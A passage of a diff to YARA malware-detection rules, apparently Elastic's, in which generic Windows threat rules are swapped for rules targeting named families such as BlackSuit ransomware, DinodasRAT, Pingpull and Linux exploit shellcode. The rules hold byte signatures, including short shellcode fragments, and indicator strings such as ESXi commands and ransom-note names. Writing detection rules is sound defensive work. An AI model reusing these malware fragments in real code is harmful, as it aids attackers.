(Windows.Generic.Threat)" + description = "Detects Windows Trojan Bloodalchemy (Windows.Trojan.BloodAlchemy)" author = "Elastic Security" - id = "742e8a70-c150-4903-a551-9123587dd473" - date = "2023-12-18" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L242-L260" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "94f7678be47651aa457256375f3e4d362ae681a9524388c97dc9ed34ba881090" - logic_hash = "2925eb8da80ef791b5cf7800a9bf9462203ab6aa743bc69f4fd2343e97eaab7c" + id = "de591c5a-95a5-4a23-bc02-7bc487b6ca4b" + date = "2023-09-25" + modified = "2023-11-02" + reference = "https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BloodAlchemy.yar#L83-L106" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "fd5cfe2558a7c02a617003140cdcf477ec451ecea4adf2808bef8f93673c28f1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "733b3563275da0a1b4781b9c0aa07e6e968133ae099eddef9cad3793334b9aa5" - severity = 50 + fingerprint = "6765378490707c5965dc4abd04169d4a94b787be3fccf3b77f1eff5d507090a4" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC E8 96 FF FF FF E8 85 0D 00 00 83 7D 08 00 A3 A4 E9 43 00 74 05 E8 0C 0D 00 00 DB E2 5D C3 8B FF 55 8B EC 83 3D B0 E9 43 00 02 74 05 E8 BA 12 00 00 FF 75 08 E8 07 11 00 00 68 FF 00 00 } + $crypto_0 = { 32 C7 8A DF 88 04 39 8B C1 6A 05 59 F7 F1 8A C7 8D 4A 01 D2 E3 B1 07 2A CA D2 E8 8B 4D F8 0A D8 02 FB 41 } + $crypto_1 = { 8A 1F 0F B6 C3 83 E0 7F D3 E0 99 09 55 ?? 0B F0 47 84 DB 79 ?? 83 C1 07 83 F9 3F } + $crypto_2 = { E8 [4] 03 F0 33 D2 8B C6 89 75 ?? 25 FF FF FF 7F 6A 34 59 F7 F1 8B 45 ?? 66 8B 0C 55 [4] 66 89 0C 43 40 89 45 ?? 3B C7 } + $crypto_3 = { 61 00 62 00 63 00 64 00 65 00 66 00 67 00 68 00 69 00 6A 00 6B 00 6C 00 6D 00 6E 00 6F 00 70 00 71 00 72 00 73 00 74 00 } + $com_tm_cid = { 9F 36 87 0F E5 A4 FC 4C BD 3E 73 E6 15 45 72 DD } + $com_tm_iid = { C0 C7 A4 AB 2F A9 4D 13 40 96 97 20 CC 3F D4 0F 85 } condition: - all of them + any of ($crypto_*) and all of ($com_tm_*) } -rule ELASTIC_Windows_Generic_Threat_79174B5C : FILE MEMORY +rule ELASTIC_Linux_Exploit_Sorso_Ecf99F8F : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Sorso (Linux.Exploit.Sorso)" author = "Elastic Security" - id = "79174b5c-bc1d-40b2-b2e9-f3ddd3ba226c" - date = "2023-12-18" - modified = "2024-01-12" + id = "ecf99f8f-1692-41ee-a70d-8c868e269529" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L262-L280" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c15118230059e85e7a6b65fe1c0ceee8997a3d4e9f1966c8340017a41e0c254c" - logic_hash = "06a2f0613719f1273a6b3f62f248c22b1cab2fe6054904619e3720f3f6c55e2e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Sorso.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c0f0a7b45fb91bc18264d901c20539dd32bc03fa5b7d839a0ef5012fb0d895cd" + logic_hash = "c771ff109e548e37134cd76ac668f0d4abafcf262de12b00236ad94fc11a99d1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1e709e5cb8302ea19f9ee93e88f7f910f4271cf1ea2a6c92946fa26f68c63f4d" - severity = 50 + fingerprint = "d2c0ccceed8a76d13c8b388e5c3b560f23ecff2b1b9c90d18e5e0d0bbdc91364" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 EC 48 56 57 6A 0F 33 C0 59 8D 7D B9 F3 AB 8B 75 0C 6A 38 66 AB 8B 4E 14 AA 8B 46 10 89 4D FC 89 45 F8 59 C1 E8 03 83 E0 3F C6 45 B8 80 3B C1 72 03 6A 78 59 2B C8 8D 45 B8 51 50 56 } + $a = { 6E 89 E3 50 54 53 50 B0 3B CD 80 31 C0 B0 01 CD } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_232B71A9 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Sorso_91A4D487 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Sorso (Linux.Exploit.Sorso)" author = "Elastic Security" - id = "232b71a9-add2-492d-8b9a-ad2881826ecf" - date = "2023-12-20" - modified = "2024-01-12" + id = "91a4d487-cbb6-4805-a4fc-5f4ff3b0e22b" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L282-L300" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1e8b34da2d675af96b34041d4e493e34139fc8779f806dbcf62a6c9c4d9980fe" - logic_hash = "c3bef1509c0d0172dbbc7e0e2b5c69e5ec47dc22365d98a914002b53b0f7d918" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Sorso.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c0f0a7b45fb91bc18264d901c20539dd32bc03fa5b7d839a0ef5012fb0d895cd" + logic_hash = "bb58c78ae3cc730aa1ef32974f65adabd63972ef181696aeb79954f904f2f405" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "908e2a968e544dfb08a6667f78c92df656c7f2c5cf329dbba6cfdb5ea7b51a57" - severity = 50 + fingerprint = "4965d806fa46b74023791ca17a90031753fbbe6094d25868e8d93e720f61d4c0" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 61 61 62 63 64 65 65 66 67 68 69 69 6A 6B 6C 6D 6E 6F 6F 70 71 72 73 74 75 75 76 77 78 79 7A 61 55 } + $a = { 80 31 C0 43 53 56 50 B0 5A CD 80 31 C0 50 68 2F } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_D331D190 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Sorso_61Eae7Dd : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Sorso (Linux.Exploit.Sorso)" author = "Elastic Security" - id = "d331d190-2b66-499e-be08-fed81e5bb5f1" - date = "2023-12-20" - modified = "2024-01-12" + id = "61eae7dd-3335-4a50-b70b-c7c5657fc540" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L302-L320" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6d869d320d977f83aa3f0e7719967c7e54c1bdae9ae3729668d755ee3397a96f" - logic_hash = "901601c892d709fa596c44df1fbe7772a9f20576c71666570713bf96727a809b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Sorso.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c0f0a7b45fb91bc18264d901c20539dd32bc03fa5b7d839a0ef5012fb0d895cd" + logic_hash = "a8bc8a2c8405b80b160ad21898003781405a762c0e627f13b34e9362e0aa51a1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "504c204dd82689bacf3875b9fd56a6a865426f3dc76de1d6d6e40c275b069d66" - severity = 50 + fingerprint = "8ada74a60e30a26f7789bfdf00b3373843f39dc7d71bd6e1b603a7a41b5a63e9" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 28 83 FA 03 74 04 85 D2 75 05 E8 EE 08 00 00 B8 01 00 00 00 48 83 C4 28 C3 CC CC CC CC 56 57 48 83 EC 38 48 89 CE 8B 01 FF C8 83 F8 05 77 12 48 98 48 8D 0D D1 49 00 00 48 63 3C 81 48 } + $a = { 69 89 E3 50 53 89 E1 B0 0B CD 80 31 C0 B0 01 CD } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_24191082 : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Blacksuit_9F53E7E5 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Ransomware Blacksuit (Linux.Ransomware.BlackSuit)" author = "Elastic Security" - id = "24191082-58a7-4d1e-88d2-b4935ba5a868" - date = "2023-12-20" - modified = "2024-01-12" + id = "9f53e7e5-7177-4e17-ac12-9214c4deddf2" + date = "2023-07-27" + modified = "2024-02-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L322-L340" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4d20878c16d2b401e76d8e7c288cf8ef5aa3c8d4865f440ee6b44d9f3d0cbf33" - logic_hash = "a5ea76032a9c189f923d91cd03deb44bd61868e5ad6081afe63249156cbd8927" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_BlackSuit.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1c849adcccad4643303297fb66bfe81c5536be39a87601d67664af1d14e02b9e" + logic_hash = "121e0139385cfef5dff394c4ea36d950314b00c6d7021cf2ca667ee942e74763" score = 75 - quality = 75 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "6bf991b391b79e897fe7964499e7e86b7b8fe4f40cf17abba85cb861e840e082" - severity = 50 + fingerprint = "34355cb1731fe6c8fa684a484943127f8fdf3814d45025e29bdf25a08b4890fd" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 8B 45 0C 48 F7 D0 23 45 08 5D C3 55 8B EC 51 8B 45 0C 48 23 45 08 74 15 FF 75 0C FF 75 08 E8 DA FF FF FF 59 59 03 45 0C 89 45 FC EB 06 8B 45 08 89 45 FC 8B 45 FC 8B E5 5D C3 55 8B EC } + $a1 = "esxcli vm process list > list_" fullword + $a2 = "Drop readme failed: %s(%d)" fullword + $a3 = "README.BlackSuit.txt" fullword condition: - all of them + 2 of them } -rule ELASTIC_Windows_Generic_Threat_Efdb9E81 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Hiddad_E35Bff7B : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Hiddad (Linux.Trojan.Hiddad)" author = "Elastic Security" - id = "efdb9e81-9004-426e-b599-331560b7f0ff" - date = "2024-01-01" - modified = "2024-01-12" + id = "e35bff7b-1a93-4cfd-a4b6-1e994c0afa98" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L342-L361" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1c3302b14324c9f4e07829f41cd767ec654db18ff330933c6544c46bd19e89dd" - logic_hash = "eae78b07f6c31e3a30ae041a27c67553bb8ea915bc7724583d78832475021955" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Hiddad.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "22a418e660b5a7a2e0cc1c1f3fe1d150831d75c4fedeed9817a221194522efcf" + logic_hash = "3881222807585dc933cb61473751d13297fa7eb085a50d435d3b680354a35ee9" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "ce1499c8adaad552c127ae80dad90a39eb15e1e461afe3266e8cd6961d3fde79" - severity = 50 + fingerprint = "0ed46ca8a8bd567acf59d8a15a9597d7087975e608f42af57d36c31e777bb816" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 4D 61 78 69 6D 75 6D 43 68 65 63 6B 42 6F 78 53 69 7A 65 } - $a2 = { 56 69 73 75 61 6C 50 6C 75 73 2E 4E 61 74 69 76 65 } + $a = { 3C 14 48 63 CF 89 FE 48 69 C9 81 80 80 80 C1 FE 1F 48 C1 E9 20 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_34622A35 : FILE MEMORY +rule ELASTIC_Windows_Exploit_Dcom_7A1Bcec7 : FILE { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Exploit Dcom (Windows.Exploit.Dcom)" author = "Elastic Security" - id = "34622a35-9ddf-4091-8b0c-c9430ecea57c" - date = "2024-01-01" - modified = "2024-01-12" + id = "7a1bcec7-e177-4adf-97a7-0d876bf65abc" + date = "2021-01-12" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L363-L381" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c021c6adca0ddf38563a13066a652e4d97726175983854674b8dae2f6e59c83f" - logic_hash = "2b49bd5d3a18307a46f44d9dfeea858ddaa6084f86f96b83b874cee7603e1c11" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Exploit_Dcom.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "84073caf71d0e0523adeb96169c85b8f0bfea09e7ef3bf677bfc19d3b536d8a5" + logic_hash = "484576ab5369f99dc7086d724ead12d464f2bedaf84c93b74e137ddd98600b06" score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "427762237cd1040bad58e9d9f7ad36c09134d899c5105e977f94933827c5d5e0" - severity = 50 + quality = 73 + tags = "FILE" + fingerprint = "0abae84599e490056412d5a5ce1868ea118551243377d59cbb6ebd83701769b8" + severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 81 EC 88 00 00 00 C7 45 FC 00 00 00 00 C7 45 F8 00 00 00 00 68 4C 00 00 00 E8 A3 42 00 00 83 C4 04 89 45 F4 8B D8 8B F8 33 C0 B9 13 00 00 00 F3 AB 83 C3 38 53 68 10 00 00 00 E8 82 42 } + $a = { 20 62 79 20 46 6C 61 73 68 53 6B 79 20 61 6E 64 20 42 65 6E } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_0Ff403Df : FILE MEMORY +rule ELASTIC_Windows_Trojan_Pingpull_09Dd9559 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Pingpull (Windows.Trojan.Pingpull)" author = "Elastic Security" - id = "0ff403df-cf94-43f3-b8b0-b94068f333f1" - date = "2024-01-01" - modified = "2024-01-12" + id = "09dd9559-ce77-4f55-9e81-3b90add40103" + date = "2022-06-16" + modified = "2022-07-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L383-L401" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b3119dc4cea05bef51d1f373b87d69bcff514f6575d4c92da4b1c557f8d8db8f" - logic_hash = "38bdd9b6f61ab4bb13abc7af94e92151928df95ade061756611218104e7245fd" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Pingpull.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "de14f22c88e552b61c62ab28d27a617fb8c0737350ca7c631de5680850282761" + logic_hash = "114674b1a9acfc7643138d3b07885343a50c9d319b8d22a6ef34e916685c4469" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3e16fe70b069579a146682d2bbeeeead63c432166b269a6d3464463ccd2bd2f8" - severity = 50 + fingerprint = "b471e0f40780523bf396323a3b70fd285944fef2960ae43a36068eaf2f2fea4f" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 81 EC 00 02 00 00 56 8B F1 57 C6 85 00 FF 63 C7 06 0C 22 41 00 0C 66 69 B6 66 01 7C 06 02 77 03 96 66 69 B6 7B 14 04 F2 05 6B 06 69 96 66 69 6F 07 C5 08 30 66 69 96 66 09 01 0A 67 0B } + $s1 = "PROJECT_%s_%s_%08X" ascii fullword + $s2 = "Iph1psvc" ascii fullword + $s3 = "IP He1per" ascii fullword + $s4 = "If this service is stopped, the computer will not have the enhanced connectivity benefits that these technologies offer." + $a1 = { 02 C? 66 C7 44 24 ?? 3A 00 4C 8D 44 24 ?? 88 4C 24 ?? 48 83 C9 FF 88 44 24 ?? F2 AE 33 ?? 0F 1F } + $a2 = { 48 85 FF 74 ?? 41 C1 E0 04 0F B6 4C 3C ?? 33 D2 8D 41 ?? ?? 19 77 ?? 80 C1 E0 8D 41 ?? 3C 09 77 } + $a3 = { 4C 63 74 24 ?? 48 8B ?? 43 8D 44 36 ?? 4C 63 E8 49 8B CD E8 ?? ?? ?? ?? 48 8B ?? 48 85 C0 0F 84 } condition: - all of them + 3 of them } -rule ELASTIC_Windows_Generic_Threat_B1F6F662 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Dinodasrat_1D371D10 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Trojan Dinodasrat (Linux.Trojan.DinodasRAT)" author = "Elastic Security" - id = "b1f6f662-ea77-4049-a58a-ed8a97d7738e" - date = "2024-01-01" - modified = "2024-01-12" + id = "1d371d10-b2ae-4ea0-ad37-f5a5a571a6fc" + date = "2024-04-02" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L403-L423" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1b7eaef3cf1bb8021a00df092c829932cccac333990db1c5dac6558a5d906400" - logic_hash = "e52ff1eaee00334e1a07367bf88f3907bb0b13035717683d9d98371b92bc45c0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_DinodasRAT.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bf830191215e0c8db207ea320d8e795990cf6b3e6698932e6e0c9c0588fc9eff" + logic_hash = "933e78882be1d8dd9553ba90f038963d1b6f8f643888258541b7668aa3434808" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "f2cd22e34b4694f707ee9042805f5498ce66d35743950096271aaa170f44a2ee" - severity = 50 + fingerprint = "a53bf582ad95320dd6f432cb7290ce604aa558e4ecf6ae4e11d7985183969db1" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 67 65 74 5F 4D 53 56 61 6C 75 65 31 30 } - $a2 = { 73 65 74 5F 4D 53 56 61 6C 75 65 31 30 } - $a3 = { 67 65 74 5F 4D 53 56 61 6C 75 65 31 31 } + $s1 = "int MyShell::createsh()" + $s2 = "/src/myshell.cpp" + $s3 = "/src/inifile.cpp" + $s4 = "Linux_%s_%s_%u_V" + $s5 = "/home/soft/mm/rootkit/" + $s6 = "IniFile::load_ini_file" condition: - all of them + 4 of them } -rule ELASTIC_Windows_Generic_Threat_2C80562D : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Arpot_09C714C5 : FILE { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Name: aswArPot.sys, Version: 21.1.187.0" author = "Elastic Security" - id = "2c80562d-2377-43b2-864f-0f122530b85d" - date = "2024-01-01" - modified = "2024-01-12" + id = "09c714c5-7639-44cf-990f-16ac0d42f8f9" + date = "2022-04-27" + modified = "2022-05-03" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L425-L445" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ee8decf1e8e5a927e3a6c10e88093bb4b7708c3fd542d98d43f1a882c6b0198e" - logic_hash = "07487ae646ac81b94f940c8d3493dbee023bce687297465fe09375f40dff0fb2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_ArPot.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1" + logic_hash = "e5f972ad9a31aefbd20237e6ea3dd19a025c2e3487fa080e9f9b8acf1e3f58e6" score = 75 - quality = 69 - tags = "FILE, MEMORY" - fingerprint = "30965c0d6ac30cfb10674b2600e5a1e7b14380072738dd7993bd3eb57c825f24" + quality = 75 + tags = "FILE" + fingerprint = "7876556bbfd68903a38103ccd6e9ec8c4c9a89e7dfaada86b6633a8d7ec9b806" + threat_name = "Windows.VulnDriver.ArPot" severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = { 50 6F 6C 79 6D 6F 64 58 54 2E 65 78 65 } - $a2 = { 50 6F 6C 79 6D 6F 64 58 54 20 76 31 2E 33 } - $a3 = { 50 6F 6C 79 6D 6F 64 20 49 6E 63 2E } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 61 00 73 00 77 00 41 00 72 00 50 00 6F 00 74 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x01][\x00-\x00])([\x00-\x15][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\xbb][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x14][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x15][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x15][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xba][\x00-\x00]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Windows_Generic_Threat_E96F9E97 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Flawedgrace_8C5Eb04B : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Flawedgrace (Windows.Trojan.FlawedGrace)" author = "Elastic Security" - id = "e96f9e97-cb44-42e5-a06b-98775cbb1f2f" - date = "2024-01-01" - modified = "2024-01-12" + id = "8c5eb04b-301b-4d05-a010-3329e5b764c6" + date = "2023-11-01" + modified = "2023-11-02" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L447-L465" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bfbab69e9fc517bc46ae88afd0603a498a4c77409e83466d05db2797234ea7fc" - logic_hash = "1dcf81b8982425ff74107b899e85e2432f0464554e923f85a7555cda65293b54" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_FlawedGrace.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "966112f3143d751a95c000a990709572ac8b49b23c0e57b2691955d6fda1016e" + logic_hash = "dc07197cb9a02ff8d271f78756c2784c74d09e530af20377a584dbfe77e973aa" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "2277fb0b58f923d394f5d4049b6049e66f99aff4ac874849bdc1877b9c6a0d3e" - severity = 50 + fingerprint = "46ce025974792cdefe9d4f4493cee477c0eaf641564cd44becd687c27d9e7c30" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 7A 47 4D 5E 5A 4D 5D 4B 7D 6D 4A 41 57 4B 54 49 5F 4C 67 6D 54 52 5B 51 46 43 6F 71 40 46 45 53 67 7C 5D 6F } + $a1 = "Grace finalized, no more library calls allowed." ascii fullword + $a2 = ".?AVReadThread@TunnelIO@NS@@" ascii fullword + $a3 = ".?AVTunnelClientDirectIO@NS@@" ascii fullword + $a4 = ".?AVWireClientConnectionThread@NS@@" ascii fullword + $a5 = ".?AVWireParam@NS@@" ascii fullword condition: - all of them + 3 of them } -rule ELASTIC_Windows_Generic_Threat_005Fd471 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Vmdrv_7C674F8E : FILE { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Name: vmdrv.sys, Version: 10.0.10011.16384" author = "Elastic Security" - id = "005fd471-d968-4ece-a61d-91beac4c1e34" - date = "2024-01-01" - modified = "2024-01-12" + id = "7c674f8e-720c-48ee-9644-5566493d2546" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L467-L487" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "502814ed565a923da15626d46fde8cc7fd422790e32b3cad973ed8ec8602b228" - logic_hash = "10493253a6b2ce3141ee980e0607bdbba72580bb4a076f2f4636e9665ffc6db8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Vmdrv.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = 